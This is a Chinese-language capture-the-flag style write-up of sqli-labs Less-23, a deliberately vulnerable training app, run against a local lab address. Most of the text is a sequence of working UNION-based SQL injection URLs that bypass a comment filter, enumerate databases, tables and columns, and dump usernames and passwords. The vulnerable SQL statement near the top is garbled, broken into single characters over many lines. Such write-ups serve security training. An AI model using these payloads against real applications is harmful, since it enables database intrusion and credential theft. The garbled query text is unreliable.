本关:
Sql 语句为
s
q
l
=
"
S
E
L
E
C
T
∗
F
R
O
M
u
s
e
r
s
W
H
E
R
E
i
d
=
′
sql="SELECT * FROM users WHERE id='
sql="SELECT∗FROMusersWHEREid=′id’ LIMIT 0,1";此处主要是在获取 id 参数时进行了#,–注释符号的过滤。
注入:
0x01:
http://192.168.83.129/sqli-labs-master/Less-23/?id=1’ order by 3 --+
页面回显,可以看出–+并没有注释掉limit之后的语句。应该是被过滤掉了,根据上文的sql语句。我们构造正确的语句。
0x02
判断字段数:
http://192.168.83.129/sqli-labs-master/Less-23/?id=1’ order by 4,'3
http://192.168.83.129/sqli-labs-master/Less-23/?id=1' order by 3,'3
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,2,database(),3' 可以看出数据有好多
爆出数据库:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),%273
爆出表:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),%273
爆出列:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),%273
爆出字段:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(username,password) from security.users),%273
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(username) from security.users),%273
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(password) from security.users),%273
至此注入结束。